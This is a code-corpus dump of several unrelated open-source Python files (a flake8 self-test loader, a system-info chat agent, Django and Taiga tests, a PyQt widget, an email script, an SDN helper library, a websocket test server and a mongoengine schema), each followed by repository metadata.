#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from flake8 import engine
import pep8
import pkg_resources
import six
import testscenarios
from testtools import content
from testtools import matchers
import hacking
import hacking.tests
SELFTEST_REGEX = re.compile(r'\b(Okay|[HEW]\d{3}):\s(.*)')
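# For illustration (not taken from this file): each hacking check documents
# self-test lines in its docstring that SELFTEST_REGEX picks up, e.g.
#   Okay: try:\n pass\n except Exception:\n pass
#   H201: try:\n pass\n except:\n pass
# An "Okay" line must raise no warning, while an error-code line must trigger
# exactly that code.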
# Each scenario is (name, dict(lines=.., options=..., code=...))
file_cases = []
class HackingTestCase(hacking.tests.TestCase):
scenarios = file_cases
def test_pep8(self):
report = pep8.BaseReport(self.options)
checker = pep8.Checker(lines=self.lines, options=self.options,
report=report)
checker.check_all()
self.addDetail('doctest', content.text_content(self.raw))
if self.code == 'Okay':
self.assertThat(
len(report.counters),
matchers.Not(matchers.GreaterThan(
len(self.options.benchmark_keys))),
"incorrectly found %s" % ', '.join(
[key for key in report.counters
if key not in self.options.benchmark_keys]))
else:
self.addDetail('reason',
content.text_content("Failed to trigger rule %s" %
self.code))
self.assertIn(self.code, report.counters)
def _get_lines(check):
for line in check.__doc__.splitlines():
line = line.lstrip()
match = SELFTEST_REGEX.match(line)
if match is None:
continue
yield (line, match.groups())
def load_tests(loader, tests, pattern):
flake8_style = engine.get_style_guide(parse_argv=False,
# Ignore H104 otherwise it's
# raised on doctests.
ignore=('F', 'H104'))
options = flake8_style.options
for entry in pkg_resources.iter_entry_points('flake8.extension'):
if not entry.module_name.startswith('hacking.'):
continue
check = entry.load()
name = entry.attrs[0]
if check.skip_on_py3 and six.PY3:
continue
for (lineno, (raw, (code, source))) in enumerate(_get_lines(check)):
lines = [part.replace(r'\t', '\t') + '\n'
for part in source.split(r'\n')]
file_cases.append(("%s-line-%s" % (name, lineno),
dict(lines=lines, raw=raw, options=options,
code=code)))
return testscenarios.load_tests_apply_scenarios(loader, tests, pattern)
|
apache-2.0
| 6,823,572,021,448,614,000 | 34.911111 | 77 | 0.586015 | false |
rmed/zoe-sysinfo
|
agents/sysinfo/sysinfo.py
|
1
|
12303
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Zoe Sysinfo - https://github.com/rmed/zoe-sysinfo
#
# Copyright (c) 2015 Rafael Medina García <rafamedgar@gmail.com>
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.)
import sys
sys.path.append('./lib')
import base64
import psutil
import zoe
from datetime import datetime
from zoe.deco import *
HTML_HEADER = """
<html>
<head>
<style>
h2 {
border-bottom: 1px solid #CCCCCC;
margin-top: 20px;
width: 100%;
}
table {
border-collapse: separate;
border-spacing: 5px;
}
</style>
</head><body>"""
HTML_FOOTER = "</body></html>"
@Agent(name="sysinfo")
class Sysinfo:
@Message(tags=["report"])
def complete_report(self, sender, src):
""" Send a complete report to user by mail. """
HTML = "" + HTML_HEADER
# CPU
cpu_html = "<h2>CPU Information</h2><ul>"
cpu_info = self.gather_cpu()
for cpu in cpu_info.keys():
info = cpu_info[cpu]
cpu_html += """
<li>%s<ul>
<li>User: %s %%</li>
<li>System: %s %%</li>
<li>Idle: %s %%</li>
</ul></li>""" % (
cpu.upper(), str(info["user"]),
str(info["system"]), str(info["idle"]))
cpu_html += "</ul>"
# Disks
disk_html = "<h2>Disk Information</h2><ul>"
disk_info = self.gather_disk()
for disk in disk_info.keys():
info = disk_info[disk]
usage = disk_info[disk]["usage"]
disk_html += """
<li>%s<ul>
<li>Mount point: %s</li>
<li>Filesystem: %s</li>
<li>Options: %s</li>
<li>Usage:<ul>
<li>Total: %s</li>
<li>Used: %s</li>
<li>Free: %s</li>
<li>Percentage used: %s %%</li>
</ul></li>
</ul></li>""" % (
disk,
info["mountpoint"],
info["fstype"],
info["opts"],
self.size_fmt(usage["total"]),
self.size_fmt(usage["used"]),
self.size_fmt(usage["free"]),
str(usage["percentage"]))
disk_html += "</ul>"
# Memory
mem_html = "<h2>Memory Information</h2><ul>"
mem_info = self.gather_memory()
for mem_type in mem_info.keys():
info = mem_info[mem_type]
mem_html += """
<li>%s<ul>
<li>Total: %s</li>
<li>Free: %s</li>
<li>Used: %s</li>
<li>Percentage used: %s</li>
</ul></li>""" % (
mem_type.title(),
self.size_fmt(info["total"]),
self.size_fmt(info["free"]),
self.size_fmt(info["used"]),
str(info["percentage"]))
mem_html += "</ul>"
# Processes
proc_html = "<h2>Running processes Information</h2><table>"
proc_html += """<tr>
<th>PID</th>
<th>Name</th>
<th>User</th>
<th>Status</th>
<th>Exec</th>
<th>Resident Memory</th>
<th>Virtual Memory</th></tr>"""
proc_info = self.gather_proc()
for proc in proc_info.keys():
info = proc_info[proc]
proc_html += """<tr>
<td>%s</td>
<td>%s</td>
<td>%s</td>
<td>%s</td>
<td>%s</td>
<td>%s</td>
<td>%s</td></tr>""" % (
str(proc),
str(info["name"]),
str(info["username"]),
str(info["status"]),
str(info["exe"]),
self.size_fmt(info["memory"]["resident"]),
self.size_fmt(info["memory"]["virtual"]))
proc_html += "</table>"
HTML += cpu_html + disk_html + mem_html + proc_html + HTML_FOOTER
attachment = self.attach_html(HTML)
return (self.feedback("Generating report...", sender, src),
self.feedback(attachment, sender, "mail"))
@Message(tags=["cpu"])
def info_cpu(self, sender, src):
""" Send basic information on CPU usage jabber or Telegram. """
cpu_info = self.gather_cpu()
msg = "CPU usage (%s)\n" % self.current_datetime()
for cpu in cpu_info.keys():
info = cpu_info[cpu]
msg += """ %s
--------
User: %s %%
System: %s %%
Idle: %s %%\n\n""" % (
cpu.upper(), str(info["user"]), str(info["system"]),
str(info["idle"]))
return self.feedback(msg, sender, src)
@Message(tags=["disk"])
def info_disk(self, sender, src):
""" Send basic information on disk usage by jabber or Telegram. """
disk_info = self.gather_disk()
msg = "Disk usage (%s)\n" % self.current_datetime()
for disk in disk_info.keys():
info = disk_info[disk]
usage = disk_info[disk]["usage"]
msg += """ %s
--------
Mount point: %s
Filesystem type: %s
Options: %s
Usage:
- Total: %s
- Used: %s
- Free: %s
- Percentage used: %s %%\n\n""" % (
disk, info["mountpoint"], info["fstype"], info["opts"],
self.size_fmt(usage["total"]),
self.size_fmt(usage["used"]),
self.size_fmt(usage["free"]),
str(usage["percentage"]))
return self.feedback(msg, sender, src)
@Message(tags=["mem"])
def info_memory(self, sender, src):
""" Send basic information on memory usage by jabber or Telegram. """
mem_info = self.gather_memory()
msg = "Memory usage (%s)\n" % self.current_datetime()
for mem_type in mem_info.keys():
info = mem_info[mem_type]
msg += """ %s
--------
Total: %s
Free: %s
Used: %s
Percentage used: %s %%\n\n""" % (
mem_type,
self.size_fmt(info["total"]),
self.size_fmt(info["free"]),
self.size_fmt(info["used"]),
str(info["percentage"]))
return self.feedback(msg, sender, src)
def attach_html(self, html):
""" Build the attachment file.
This file is stored in the directory specified in
        ZOE_HOME/etc/sysinfo.conf (the directory must already exist)
"""
now = datetime.today()
filename = "sysinfo_%s_%s_%s_%s_%s_%s.html" % (
str(now.day), str(now.month), str(now.year),
str(now.hour), str(now.minute), str(now.second))
b64 = base64.standard_b64encode(bytes(html, 'utf-8')).decode('utf-8')
return zoe.Attachment(b64, "text/html", filename)
def current_datetime(self):
""" Return the current date and time in human-readable format. """
now = datetime.today()
return now.strftime("%d/%m/%Y - %H:%M:%S")
def feedback(self, data, user, dst):
""" Send feedback to the user
data -- may be text or an attachment for e-mail
user -- user to send the feedback to
dst -- either 'jabber', 'tg' or 'mail'
"""
to_send = {
"dst": "relay",
"relayto": dst,
"to": user
}
if dst == "jabber" or dst == "tg":
to_send["msg"] = data
else:
to_send["html"] = data.str()
to_send["subject"] = "System information report"
return zoe.MessageBuilder(to_send)
def gather_cpu(self):
""" Gather information on system CPU.
Obtains usage percentage for each CPU present for user,
system and idle.
"""
result = {}
cpu_info = psutil.cpu_times_percent(percpu=True)
for index, cpu in enumerate(cpu_info):
result["cpu" + str(index)] = {
"user": cpu.user,
"system": cpu.system,
"idle": cpu.idle
}
return result
def gather_disk(self):
""" Gather information on system disks.
Obtains mounted disk partitions and their usage statistics.
"""
result = {}
partitions = psutil.disk_partitions(all=True)
for partition in partitions:
part_usage = psutil.disk_usage(partition.mountpoint)
result[partition.device] = {
"mountpoint": partition.mountpoint,
"fstype": partition.fstype,
"opts": partition.opts,
"usage": {
"total": part_usage.total,
"used": part_usage.used,
"free": part_usage.free,
"percentage": part_usage.percent
}
}
return result
def gather_memory(self):
""" Gather information on system memory.
Obtains physical RAM and swap statistics.
"""
result = {}
mem_info = psutil.virtual_memory()
swap_info = psutil.swap_memory()
result["ram"] = {
"total": mem_info.total,
"free": mem_info.available,
"used": mem_info.used,
"percentage": mem_info.percent
}
result["swap"] = {
"total": swap_info.total,
"free": swap_info.free,
"used": swap_info.used,
"percentage": swap_info.percent
}
return result
def gather_proc(self):
""" Gather information on running processes.
Obtains pid, name, executable, user running the process,
status of the process and memory usage.
"""
result = {}
for proc in psutil.process_iter():
try:
process = psutil.Process(proc.pid)
proc_data = process.as_dict(
attrs=["name", "exe", "username", "status"])
mem_info = process.memory_info()
proc_data["memory"] = {}
proc_data["memory"]["resident"] = mem_info.rss
proc_data["memory"]["virtual"] = mem_info.vms
result[proc.pid] = proc_data
except psutil.NoSuchProcess:
continue
return result
def size_fmt(self, num):
""" Represents amount of bytes in a better human-readable way.
Obtained from http://stackoverflow.com/a/1094933
"""
for unit in ['B','KiB','MiB','GiB','TiB','PiB','EiB','ZiB']:
if abs(num) < 1024.0:
return "%3.1f %s" % (num, unit)
num /= 1024.0
return "%.1f %s" % (num, 'YiB')
|
mit
| 5,714,891,798,546,808,000 | 29.83208 | 80 | 0.482361 | false |
futurice/django-jsonmodel
|
test/test_human.py
|
1
|
1642
|
from django.test import TestCase
from django.core.urlresolvers import reverse
from djangojsonmodel.convert import jsmodels
from djangojsonmodel.contrib.human.mappings import shortnames
from djangojsonmodel.contrib.human.urls import drf
from .urls import urlpatterns
from .urls_api import router
from pprint import pprint as pp
MAPPING = {
'BooleanField':'text',
'CharField':'text',
'DateTimeField':'datetime',
'DecimalField':'text',
'EmailField':'text',
'ForeignKey':'fk',
'ForeignObjectRel':'fk',
'IntegerField':'text',
'ManyToManyField':'m2m',
'TextField':'textarea',
'ChoiceField':'select',
}
def get_field(fields, name):
return list(filter(lambda x: x['name']==name, fields))[0]
class HumanTest(TestCase):
def test_human_shortnames(self):
out = jsmodels(applications=['test',])
out = shortnames(out, mapping=MAPPING)
self.assertTrue(
filter(lambda x: 'short_name' in x,
out['models']['Person']['fields']))
for field in out['models']['Person']['fields']:
if field['field'] == 'CharField':
self.assertEquals(field['short_name'], 'text')
def test_human_urls(self):
self.assertTrue(reverse('person-list'))
self.assertTrue(reverse('person-detail', kwargs=dict(pk=1)))
out = jsmodels(applications=['test',], prepare=False)
out = drf(out)
f = get_field(out['models']['Account']['fields'], 'person')
self.assertEqual(f['url']['id'], '/api/account/:id')
f = get_field(out['models']['Account']['fields'], 'name')
self.assertEqual(f['url']['id'], '/api/account/:id')
|
mit
| -5,252,892,620,313,928,000 | 30.576923 | 68 | 0.644945 | false |
gkunter/coquery
|
coquery/gui/ui/findWidgetUi.py
|
1
|
2751
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'findWidget.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FindWidget(object):
def setupUi(self, FindWidget):
FindWidget.setObjectName("FindWidget")
FindWidget.resize(1040, 102)
self.horizontalLayout = QtWidgets.QHBoxLayout(FindWidget)
self.horizontalLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.button_find_close = QtWidgets.QToolButton(FindWidget)
icon = QtGui.QIcon.fromTheme("window-close")
self.button_find_close.setIcon(icon)
self.button_find_close.setObjectName("button_find_close")
self.horizontalLayout.addWidget(self.button_find_close)
self.label = QtWidgets.QLabel(FindWidget)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.edit_find = QtWidgets.QLineEdit(FindWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.edit_find.sizePolicy().hasHeightForWidth())
self.edit_find.setSizePolicy(sizePolicy)
self.edit_find.setObjectName("edit_find")
self.horizontalLayout.addWidget(self.edit_find)
self.button_find_next = QtWidgets.QPushButton(FindWidget)
icon = QtGui.QIcon.fromTheme("go-down")
self.button_find_next.setIcon(icon)
self.button_find_next.setObjectName("button_find_next")
self.horizontalLayout.addWidget(self.button_find_next)
self.button_find_prev = QtWidgets.QPushButton(FindWidget)
icon = QtGui.QIcon.fromTheme("go-up")
self.button_find_prev.setIcon(icon)
self.button_find_prev.setObjectName("button_find_prev")
self.horizontalLayout.addWidget(self.button_find_prev)
self.horizontalLayout.setStretch(2, 1)
self.retranslateUi(FindWidget)
QtCore.QMetaObject.connectSlotsByName(FindWidget)
def retranslateUi(self, FindWidget):
_translate = QtCore.QCoreApplication.translate
FindWidget.setWindowTitle(_translate("FindWidget", "Form"))
self.button_find_close.setText(_translate("FindWidget", "..."))
self.label.setText(_translate("FindWidget", "Find:"))
self.button_find_next.setText(_translate("FindWidget", "Next"))
self.button_find_prev.setText(_translate("FindWidget", "Previous"))
|
gpl-3.0
| 5,910,999,480,630,010,000 | 46.431034 | 102 | 0.708833 | false |
zaxlct/python-django-learning
|
SendMail/通过SSL发送邮件.py
|
1
|
1172
|
# coding:utf-8
#!/usr/bin/env python
import smtplib,datetime,sys
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
username = sys.argv[1]
passwd = sys.argv[2]
_user = "oa@eycode.com"
_pwd = "密码"
_to_list = ["%s@eycode.com"%username]
msg = MIMEMultipart()
# Set the mail encoding
msg["Accept-Language"] = "zh-CN"
msg["Accept-Charset"] = "ISO-8859-1,utf-8"
# Mail subject
msg["Subject"] = u"VPN information - please keep it confidential"
msg["From"] = _user
msg['to'] = ','.join(_to_list)
# Message body
part = MIMEText("""
Hello \n
Your VPN account has been activated \n
Account: %s \n
Password: %s \n
Archive password: imay \n
See the attachment for the usage guide \n
""" % (username,passwd) ,_charset="utf-8")
msg.attach(part)
# Attachment
part = MIMEApplication(open("VPN.rar",'rb').read())
part.add_header('Content-Disposition', 'attachment', filename="VPN.rar")
msg.attach(part)
# Send the mail over SSL
server = smtplib.SMTP_SSL()
server.connect("smtp.exmail.qq.com", 465)
server.login(_user, _pwd)
server.sendmail(_user, _to_list, msg.as_string())
server.close()
|
mit
| -3,474,270,333,641,462,300 | 20.5 | 72 | 0.67345 | false |
haidlir/drox
|
lib.py
|
1
|
4946
|
# The MIT License (MIT)
# Copyright (c) 2015 haidlir
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This component stores libraries for the application.
"""
from __future__ import print_function
from bucket import bucket
def curr_to_capacity(curr):
capacity = {
1 : 10.,
2 : 10.,
4 : 100.,
8 : 100.,
16 : 1000.,
32 : 1000.,
64 : 10000.
}
# return capacity[127 & curr]
return 100. # for TC in mininet
class PortDetail(object):
def __init__(self, index, name, port_no, state, capacity):
self.index = index
self.name = name
self.port_no = port_no
self.state = state
self.capacity = capacity
self.upload = 0
self.__name__ = name
def set_load(self, load = 0):
self.upload = load
    def __repr__(self):
return "%s:%s:(%s/%sMbps)" % (self.name, self.port_no, self.upload,
self.capacity)
class LinkDetail(object):
def __init__(self, dpid, capacity, interface):
self.dpid = dpid
self.capacity = capacity
self.interface = interface
# self.update_load()
def update_load(self):
self.load = bucket.port_info[self.dpid][self.interface].upload
# self.metric = self.calc_metric()
# print(self.__repr__())
def calc_metric(self):
return 10**2/(self.capacity-self.load)
def residual_capacity(self):
return self.capacity-self.load
def __repr__(self):
return "capacity= %s; load = %s; metric = %s" % (self.capacity,
self.load,
self.metric)
class ARPDets(object):
def __init__(self, dpid, port, mac_addr, time = 0):
self.dpid = dpid
self.port = port
self.mac_addr = mac_addr
# self.time = time
class OneWayPath(object):
def __init__(self, path, source):
self.path = path
self.source = source
# self.metric = self.calc_metric()
def calc_metric(self):
temp_metric = 0
for i in range(len(self.path)):
if i == 0:
temp_metric = bucket.matrix_adj[self.source][self.path[i]].metric
else:
temp_metric += bucket.matrix_adj[self.path[i-1]][self.path[i]].metric
return temp_metric
def get_metric(self):
return self.calc_metric()
def calc_metric_SNH(self):
temp_metric = 0
for i in range(len(self.path)):
if i == 0:
metric_of_this_pair = bucket.matrix_adj[self.source][self.path[i]].residual_capacity()
temp_metric = metric_of_this_pair
else:
metric_of_this_pair = bucket.matrix_adj[self.path[i-1]][self.path[i]].residual_capacity()
if temp_metric > metric_of_this_pair:
temp_metric = metric_of_this_pair
return temp_metric
def get_metric_SNH(self):
return self.calc_metric_SNH()
class FlowEntry(object):
def __init__(self, nw_src, nw_dst, nw_proto, tp_src, tp_dst, in_port, out_port, path = [], **opts):
self.nw_src = nw_src
self.nw_dst = nw_dst
self.nw_proto = nw_proto
self.tp_src = tp_src
self.tp_dst = tp_dst
self.in_port = in_port
self.out_port = out_port
self.path = path
if 'dpid' in opts:
self.initial_dpid = opts['dpid']
else:
self.initial_dpid = bucket.arp_table[nw_src].dpid
self.bps = 0.
self.byte_count = 0.
def __repr__(self):
return "%s:%s >%s> %s:%s |%s| %s Mbps" % (self.nw_src, self.tp_src,\
self.nw_proto, self.nw_dst, \
self.tp_dst, self.path, self.bps/10.**6)
|
mit
| 212,829,334,784,592,700 | 33.587413 | 105 | 0.573797 | false |
dayatz/taiga-back
|
tests/integration/test_totals_projects.py
|
1
|
5868
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2017 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014-2017 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2017 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2017 Anler Hernández <hello@anler.me>
# Copyright (C) 2014-2017 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# Copyright (C) 2014-2017 Taiga Agile LLC <taiga@taiga.io>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pytest
import datetime
from .. import factories as f
from taiga.projects.history.choices import HistoryType
from taiga.projects.models import Project
from django.core.urlresolvers import reverse
from django.utils import timezone
pytestmark = pytest.mark.django_db
def test_project_totals_updated_on_activity(client):
project = f.create_project()
totals_updated_datetime = project.totals_updated_datetime
now = timezone.now()
assert project.total_activity == 0
totals_updated_datetime = project.totals_updated_datetime
us = f.UserStoryFactory.create(project=project, owner=project.owner)
f.HistoryEntryFactory.create(
project=project,
user={"pk": project.owner.id},
comment="",
type=HistoryType.change,
key="userstories.userstory:{}".format(us.id),
is_hidden=False,
diff=[],
created_at=now - datetime.timedelta(days=3)
)
project = Project.objects.get(id=project.id)
assert project.total_activity == 1
assert project.total_activity_last_week == 1
assert project.total_activity_last_month == 1
assert project.total_activity_last_year == 1
assert project.totals_updated_datetime > totals_updated_datetime
totals_updated_datetime = project.totals_updated_datetime
f.HistoryEntryFactory.create(
project=project,
user={"pk": project.owner.id},
comment="",
type=HistoryType.change,
key="userstories.userstory:{}".format(us.id),
is_hidden=False,
diff=[],
created_at=now - datetime.timedelta(days=13)
)
project = Project.objects.get(id=project.id)
assert project.total_activity == 2
assert project.total_activity_last_week == 1
assert project.total_activity_last_month == 2
assert project.total_activity_last_year == 2
assert project.totals_updated_datetime > totals_updated_datetime
totals_updated_datetime = project.totals_updated_datetime
f.HistoryEntryFactory.create(
project=project,
user={"pk": project.owner.id},
comment="",
type=HistoryType.change,
key="userstories.userstory:{}".format(us.id),
is_hidden=False,
diff=[],
created_at=now - datetime.timedelta(days=33)
)
project = Project.objects.get(id=project.id)
assert project.total_activity == 3
assert project.total_activity_last_week == 1
assert project.total_activity_last_month == 2
assert project.total_activity_last_year == 3
assert project.totals_updated_datetime > totals_updated_datetime
totals_updated_datetime = project.totals_updated_datetime
f.HistoryEntryFactory.create(
project=project,
user={"pk": project.owner.id},
comment="",
type=HistoryType.change,
key="userstories.userstory:{}".format(us.id),
is_hidden=False,
diff=[],
created_at=now - datetime.timedelta(days=380)
)
project = Project.objects.get(id=project.id)
assert project.total_activity == 4
assert project.total_activity_last_week == 1
assert project.total_activity_last_month == 2
assert project.total_activity_last_year == 3
assert project.totals_updated_datetime > totals_updated_datetime
def test_project_totals_updated_on_like(client):
project = f.create_project()
f.MembershipFactory.create(project=project, user=project.owner, is_admin=True)
totals_updated_datetime = project.totals_updated_datetime
now = timezone.now()
assert project.total_activity == 0
now = timezone.now()
totals_updated_datetime = project.totals_updated_datetime
us = f.UserStoryFactory.create(project=project, owner=project.owner)
l = f.LikeFactory.create(content_object=project)
l.created_date=now-datetime.timedelta(days=13)
l.save()
l = f.LikeFactory.create(content_object=project)
l.created_date=now-datetime.timedelta(days=33)
l.save()
l = f.LikeFactory.create(content_object=project)
l.created_date=now-datetime.timedelta(days=633)
l.save()
project.refresh_totals()
project = Project.objects.get(id=project.id)
assert project.total_fans == 3
assert project.total_fans_last_week == 0
assert project.total_fans_last_month == 1
assert project.total_fans_last_year == 2
assert project.totals_updated_datetime > totals_updated_datetime
client.login(project.owner)
url_like = reverse("projects-like", args=(project.id,))
response = client.post(url_like)
project = Project.objects.get(id=project.id)
assert project.total_fans == 4
assert project.total_fans_last_week == 1
assert project.total_fans_last_month == 2
assert project.total_fans_last_year == 3
assert project.totals_updated_datetime > totals_updated_datetime
|
agpl-3.0
| -8,717,044,814,042,567,000 | 35.203704 | 82 | 0.701449 | false |
vlegoff/tsunami
|
src/primaires/perso/montrer/__init__.py
|
1
|
1990
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Package contenant un objet destiné à montrer des informations.
Par exemple, vous trouverez dans ce package le module score et la classe
MontrerScore, destinée à montrer le score d'un personnage. L'intérêt de
passer par des classes (simple conteneurs, méthodes statiques) est que l'on
peut utiliser la même classe pour afficher différents scores (celui d'un
PNJ, d'un joueur, d'un familier, de soi-même).
"""
|
bsd-3-clause
| -8,451,832,110,852,041,000 | 49.769231 | 79 | 0.781313 | false |
cgqyh/pyalgotrade-mod
|
testcases/websocket_server.py
|
1
|
1284
|
import threading
from wsgiref import simple_server
from ws4py.server import wsgirefserver
from ws4py.server import wsgiutils
class WebSocketServerThread(threading.Thread):
def __init__(self, host, port, webSocketServerClass):
super(WebSocketServerThread, self).__init__()
self.__host = host
self.__port = port
self.__webSocketServerClass = webSocketServerClass
self.__server = None
def run(self):
def handler_cls_builder(*args, **kwargs):
return self.__webSocketServerClass(*args, **kwargs)
self.__server = simple_server.make_server(
self.__host,
self.__port,
server_class=wsgirefserver.WSGIServer,
handler_class=wsgirefserver.WebSocketWSGIRequestHandler,
app=wsgiutils.WebSocketWSGIApplication(handler_cls=handler_cls_builder)
)
self.__server.initialize_websockets_manager()
self.__server.serve_forever()
def stop(self):
self.__server.shutdown()
# webSocketServerClass should be a subclass of ws4py.websocket.WebSocket
def run_websocket_server_thread(host, port, webSocketServerClass):
wss_thread = WebSocketServerThread(host, port, webSocketServerClass)
wss_thread.start()
return wss_thread
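# --- Illustrative usage sketch (not part of the original test helper) ---
# EchoServer, the host and the port below are made-up for demonstration; any
# ws4py WebSocket subclass can be plugged in the same way.
if __name__ == '__main__':
    import time
    from ws4py import websocket

    class EchoServer(websocket.WebSocket):
        def received_message(self, message):
            # Echo every received frame back to the client unchanged.
            self.send(message.data, message.is_binary)

    server_thread = run_websocket_server_thread("localhost", 8765, EchoServer)
    time.sleep(1)  # the server accepts connections during this window
    server_thread.stop()
    server_thread.join()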
|
apache-2.0
| -4,481,928,351,619,121,000 | 33.702703 | 83 | 0.679907 | false |
clipo/idss-seriation
|
seriation/database.py
|
1
|
10460
|
#!/usr/bin/env python
# Copyright (c) 2015. Mark E. Madsen <mark@madsenlab.org>
#
# This work is licensed under the terms of the Apache Software License, Version 2.0. See the file LICENSE for details.
"""
Description here
"""
from mongoengine import *
from seriation import idss_version
import datetime
import logging as logger
def get_file_location_keys():
return sorted([k for k,v in SeriationFileLocations._fields.iteritems()])
class SeriationFileLocations(EmbeddedDocument):
# files used by IDSS.py itself
inputfile = StringField()
xyfile = StringField()
pairfile = StringField()
mstfile = StringField()
shapefile = StringField()
metadatafile = StringField()
frequencyvnafile = StringField()
frequencypairsvnafile = StringField()
frequencymstvnafile = StringField()
frequencymstdistvnafile = StringField()
frequencypointsshapefile = StringField()
frequencyatlasfile = StringField()
frequencyexceltxtfile = StringField()
frequencyexcelwookbookfile = StringField()
frequencysumgraphbyweightgmlfile = StringField()
frequencysumgraphbyweightshapefile = StringField()
frequencysumgraphbyweightvnafile = StringField()
frequencysumgraphbyweightpngfile = StringField()
frequencysumgraphbycountpngfile = StringField()
frequencysumgraphbycountgmlfile = StringField()
frequencyminmaxbyweightpngfile = StringField()
frequencyminmaxbyweightgmlfile = StringField()
frequencygeosignificancefile = StringField()
frequencymstpngfile = StringField()
contsumgraphfile = StringField()
contmstminfile = StringField()
contminmaxweightgml = StringField()
contminmaxcountgml = StringField()
continuityexceltxtfile = StringField()
continuityexcelworkbookfile = StringField()
continuityatlasfile = StringField()
continuityvalidseriationsatlasfile = StringField()
continuityuniquevalidseriationsatlasfile = StringField()
continuityvalidseriationsexceltxtfile = StringField()
continuityvalidseriationsexcelworkbookfile = StringField()
